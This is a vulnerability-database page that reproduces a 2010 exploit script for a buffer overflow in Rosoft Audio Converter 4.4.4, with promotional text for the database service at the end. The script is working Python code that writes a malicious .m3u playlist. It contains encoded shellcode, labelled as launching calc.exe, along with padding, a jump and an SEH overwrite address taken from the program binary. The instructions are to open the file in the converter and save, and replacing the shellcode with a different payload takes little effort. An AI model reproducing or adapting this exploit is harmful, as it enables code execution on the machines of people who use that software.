Lucene search
K

Rosoft Audio Converter 4.4.4 Buffer Overflow

🗓️ 16 Jun 2010 00:00:00Reported by BlakeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Rosoft Audio Converter 4.4.4 Buffer Overflow, Windows XP SP3 / Windows 7 Home, Create malicious file, Open in audio converter, Select sav

Code
`# Exploit Title: Rosoft Audio Converter 4.4.4 Buffer Overflow  
# Date: June 14, 2010  
# Author: Blake  
# Software Link: http://www.rosoftengineering.com/freeware/RosoftAudioConverterFree.aspx  
# Version: 4.4.4  
# Tested on: Windows XP SP3 / Windows 7 Home (change shellcode for Windows 7)  
# Instructions: create malicious file, open in audio converter, select save  
  
print "\n============================"  
print "Rosoft Audio Converter 4.4.4"  
print " Written by Blake "  
print " Tested on Windows XP SP3 "  
print "============================\n"  
  
# calc.exe  
sc =(  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"  
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"  
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"  
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"  
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"  
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"  
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"  
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"  
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"  
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"  
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"  
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"  
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"  
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"  
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"  
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"  
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"  
"\x4e\x46\x43\x36\x42\x50\x5a")  
  
buffer = "\x41" * (4083 - len(sc))  
nops = "\x90" * 20  
near_jmp = "\xe8\xf4\xef\xff\xff" # jmp back   
next_seh = "\xeb\xf9\x90\x90"   
seh = "\xe7\xb3\x49\x00" #Found pop eax - pop ebx - ret at 0x0049B3E7 [rosoftaudioconverterfree.exe]  
junk = "\xCC" * 25000  
  
print "[+] Creating malicious .m3u file"  
try:  
file = open("blake.m3u","w")  
file.write(buffer + nops + sc + near_jmp + next_seh + seh + junk)  
file.close()  
print "[+] File created"  
except:  
print "[x] Could not create file"  
  
raw_input("\nPress any key to exit...\n")  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation